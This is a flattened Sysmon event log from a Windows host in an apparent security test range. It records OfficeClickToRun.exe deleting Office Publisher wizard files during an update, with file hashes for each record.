Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\FEZIP.POCMD5=2218EB1B4C48834D9194C86363A7B42B,SHA256=75B90C307314D048DBE059FFA0006678A5CEB0ACFEDEE2F27803DCD4D1DF0701,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\ENVHM.POCMD5=D66C93671FE01A95B3014DA141DC4989,SHA256=FA9A5AAA95F904C5067FED0C47DBA4A1F4811E887501F9C8A65838475CC24DF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\ENVELOPE.XMLMD5=371F96DB8CCB4C56F5ECE8B5851D6529,SHA256=D5A8329A946A0154461B3218B4974776075386CCEC02500DD392F8B82AC55403,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\ENVELOPE.DPVMD5=8368AE0710A70A0C8790AC593669895F,SHA256=EB9EAB0D8E7D8D2B93EFEC3CA518EC38D3CFD5D7217FC9F3D1E93ED91F03FCE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\ENV98SP.POCMD5=9196D83D469F4EAFC233BE6BB7FD6B65,SHA256=3EF2599E9B7CC4120E2B3C999123BF715DAD547B6816B64AD9BD9B6405F86635,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\ENV98.POCMD5=15FEFB684E85AA90A598417FF0C2B527,SHA256=BC0E1B3E745FE09321880670D5E8A89DCA59E6CA2031D6100AF9C7BDC82B70C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\ENV11.POCMD5=8034DD38C9DB81207C96BDF09541BCF3,SHA256=3D6E6B2F1354B69B46AEEB6C25D94CAC34517C50C570222A727201DD4079914C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\EMAILMOD.POCMD5=36A18EC3D4502DC3E2B76BB784050CE5,SHA256=010B20B7934DEBB5E2A2964319A382337E2D7BF7F56FA57BFDDC516E7ECDC202,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\EMAIL11.POCMD5=BF41DCFC694AD9930AE8DEB57FAE213D,SHA256=A1F8BBE34B30CF669682352EE25B439CB667BB4D4C6BA8276819AA038D9CB866,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\EMAIL.XMLMD5=E89CE5DB2DAF38DBBB7625B1FDF632B3,SHA256=04E1D7A6737790E7A078FD38D329EFB6BBB8B82AA55917906F2756F5C6906715,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\EMAIL.DPVMD5=602A184BE40ECC33161E4615A998AF3C,SHA256=45C746C2D922D55B5665ADC25C941B73D971993CACA08F38A1F70B6EFF5EB3F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DVDHM.POCMD5=267455D225BF6DD1831987840133CB9E,SHA256=623B7DC01BDA633C030322EFBC5F26692BA27DE1B61067CF4920625D009EC43B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DOTS.POCMD5=C3829CEE43A73EA9B288090304AD9721,SHA256=CC34D29885B7D3DDBE443AA14FF93CF53A86A4F093501B08B8AA4FD98268DF0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGZIPC.XMLMD5=BB524B0F87D16ECB02E39C4368AAEF5D,SHA256=F53DED2947B298DEF35BD7B696089061DC1D08C68BB3CFDE507C5A916282C66F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGZIP.DPVMD5=48AEA795D7F69CF0B71EF126B2191B78,SHA256=5B480664EFE482EF65CEB3DCA6E97B72726EB40AE8ECB996211CCF0CDD20237F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGWEBSBR.XMLMD5=0305B0D1C6261777962541856143C171,SHA256=808C4476075B0268948B364FE33669FAC22717BC9933328D0750737919224F6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGWEBSBR.DPVMD5=B64D768BA46413FFA69C11DFE0FD4D5B,SHA256=FE80C00F81B839F7A950211BE8C2E7B04862B9BF368351A4D3E08C8A23E7CE31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGWEBREF.XMLMD5=F4ADE7F7898B4D445E9B5ED1494CEF50,SHA256=7046A66471B710E6FEE4298CBBB993E7DACD346CB9956135A1C97E7A2AC84116,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGWEBPQT.XMLMD5=5428CD8216CDF2DC1E8C803A183B3F54,SHA256=44D4DF53A49BFAAD2054F5C935F6F2919A1EB516209D3831FF926A5EF61B63F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGWEBPQT.DPVMD5=A524FBB5C117EE732F3DB14B06070F33,SHA256=FE23B205823EBD63DC5B04484E2257674D2112BC34B2668F0CD1919C2E05710F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGWEBHD.XMLMD5=C0599BCB8BB2D810B05F237CAD59F301,SHA256=F663E817E6FCDDC71B38641D6F5EC0848E112443110465DBBD1B5FE88632DFFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGWEBHD.DPVMD5=2B9AFDB7A80A5E94340CE55D27A674B3,SHA256=3CCD3C16B5C45DA15228F6BAE986AD18F5998E64D17414972265A7EF9D5E801B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGWEBCAL.XMLMD5=BC6465716497329220969C30AFADEF90,SHA256=69D6F08ED0FEACF1B083945ED524AA23B1767B04CBEAEE081727A77B81C80E25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGWEBCAL.DPVMD5=6CD060530CC552D8F6F6A72FC783C03B,SHA256=2A296EB7B5A7ECE84CC8452B1E87332818359B22FBF81048A8A9D82A1810AF7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGWEBBTN.XMLMD5=50291E1A931D50099C6655FD5271A2BB,SHA256=326C91BBE85E16584F93C9D33D23894C210871636D6AB7798634AFEDD8864516,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGWEBBTN.DPVMD5=1DBDE30E05C45AA8B6DA9640430F9257,SHA256=3D3542CA7A7561D5209F25F474856C93D0AAA5DA39D9ADA39C99EEB0BDDE8C92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGWEBAD.XMLMD5=2AC9F185B512793D463E1C3298985FE8,SHA256=01E7C3BDC13E1016DB51C7647F2B76112C69D1B07C26A09D0D1143391AD44041,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGTOC.XMLMD5=DB0B68FC2255AC0EEFD8D34BEE921B76,SHA256=93407128FEB294B2805FD721560084805049DBCB1C461B201B0C2B5EE33A9AE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGTOC.DPVMD5=319ACEA29D0F46DFDFDFD3136397A022,SHA256=7541BB104C528C206BDC6F2ECE238FB3C1F8AC5EED6A7CF987949651D2A28F37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGTEAR.DPVMD5=EDB6004D27FE27846AA1222598E24DCA,SHA256=821B02629BFBC7C337F23985345B6B584306A0E4ECF3FF64959F2FB01F789864,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGSTORYVERT.XMLMD5=6A5039CC39A04C06B7E3D6DF2E54295D,SHA256=47486EE06F2815D74308760D89DD5EC7B75CE1CF3A2B18A01689BB11CFB370B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGSTORY.XMLMD5=F86CF0F9F28536EE81CDD40B3FB85A67,SHA256=66C0B54EE5498D835C5299061758FCEB555EC35001E3FABA073FA830A7223C84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGSIDEBRV.XMLMD5=576D032FF8B955EECD81E728FBF4C2DE,SHA256=97CA548C438D3520485DF80D7B952009B0A0143A2CC82822A5AF786999F50CD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGSIDEBR.XMLMD5=8A93906A9EE4A326F9A3D9887DB18555,SHA256=340C643872C88D97944347D8649503560E340111FB2CE8A0DFE0165D250FDF95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGSIDEBR.DPVMD5=61E7143425A7A60F0FD6509541415120,SHA256=D14F1F57941C2EA4593496714596B288BDB73C597F194546B751D036D6650F3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGREPFRM.XMLMD5=A0EFAF2E370D9A42DFFEDA0FE04E2FBB,SHA256=F6375B4CA98D3F5EEBF6B9ACECE3D7FFFE3AD517B02DA880ABF10363766AD001,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGREPFRM.DPVMD5=D5161C56673725729FA439E5FFB2E9C5,SHA256=4F8759733DEDA528E1CCE1749FA2114873A8FCE6BF31F1B72A260BCBD566C558,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGPUNCT.XMLMD5=331EA994904EBF93B49BDB5AAA89B669,SHA256=9BB4CDEC2DAE164E98642C2531B89F8AFDFDBE00E3DDEFB77643C857921E91EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGPUNCT.DPVMD5=35FC9EE08193744AD90D9021683CB2A2,SHA256=821B3DEF7E83938A1438BAA19DC721ABC5A58FECA8B513945733116160C6D204,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGPQUOT.XMLMD5=8DAFA9906B9FDDF24A239DB81298E47A,SHA256=8FAEC190ECE553B761D90B8402FA14ED23ACA119138DE481D2D5ED86CD740F4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGPQUOT.DPVMD5=537FCF01B1931E72F38C14E9D071C416,SHA256=E971BB05AA1F55AF7660057C84C89BB0382161C8B8F62E640E757C82FD5793C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGPICCAP.XMLMD5=4E8CC7BDE1C5F04B64333FDBA00A543A,SHA256=64E7BBD67941BC3CCD9FB024574695F0D686C656EAFDCAAD5E840F4E942731C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGPICCAP.DPVMD5=E8230DA86769202911EC52C70321B2AB,SHA256=A2B12471F884D3AE96EDC4E2C81BE516445C988158C1E1A573EA3A04B61E4E3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGNAVBAR.XMLMD5=D0FB54CF492A1BAB734E4ECD01E1469E,SHA256=79FBD59725733E4E6D792B5B64728ED29C2BE0F39953B677982360528417F54F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\DGNAVBAR.DPVMD5=2668A99D54FC8C64306E829B0AAD3968,SHA256=60AF8640576CF78AC0A18355EBDDAB9C7BFC7BC6A671507D43A9FA1530AF13E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program 